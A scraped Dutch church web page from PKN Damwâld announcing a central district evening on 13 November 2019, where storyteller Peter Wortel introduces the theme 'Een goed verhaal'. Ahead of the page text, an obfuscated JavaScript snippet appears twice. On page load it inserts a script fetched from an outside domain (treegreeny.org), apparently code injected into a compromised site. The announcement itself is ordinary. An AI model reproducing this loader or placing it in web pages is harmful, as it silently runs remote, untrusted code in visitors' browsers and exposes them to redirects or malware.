;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Centrale wijkavond Hervormd Akkerwoude c.a. - PKN Damwâld

Centrale wijkavond Hervormd Akkerwoude c.a.

Gepubliceerd op: maandag 4 november 2019

Een wijkavond is een goede gelegenheid om elkaar te ontmoeten en met elkaar in gesprek te gaan over vragen rondom geloven. Wat betekent het voor onszelf, voor die ander? Ook een mooie gelegenheid om andere gemeenteleden te ontmoeten, elkaar beter te leren kennen, samen te praten en na te denken over wat voor onze gemeente van belang is. We hebben dit jaar gekozen om één grote, gezamenlijke wijkavond te houden en rasverteller/kunstenaar Peter Wortel is als gastspreker uitgenodigd om het thema in te leiden.

‘Een goed verhaal’ is het (PKN-) thema voor het seizoen 2019-2020. In de kerk leven en werken we vanuit het goede verhaal dat ons in de Bijbel wordt verteld. Gods Woord in mensentaal, voor velen een bron van troost, bemoediging en inspiratie. Maar ook een boek dat cultureel en maatschappelijk relevant is, bijvoorbeeld als het gaat om omgang met de natuur of zorgen voor een ander. Bijbelse verhalen nodigen je uit om deze te vertalen naar je eigen leven. Daarmee wordt het goede verhaal van God en mensen een spiegel voor ons dagelijkse leven. In de kerkdienst maar ook in gespreksgroepen, tijdens catechisatie, bezoekwerk en op allerlei andere plekken zijn we bezig met dat goede verhaal. Een goed verhaal laat je namelijk niet koud maar brengt je in beweging. Een goed verhaal houd je niet voor jezelf maar deel je met anderen.

Voor wie? Voor iedereen!

Door wie?  Peter Wortel

Wanneer? 13 november, 19.30 uur

Locatie?   ’t Skûlplak

Opgave/info ? Sjoukje Heidstra, 0511-421934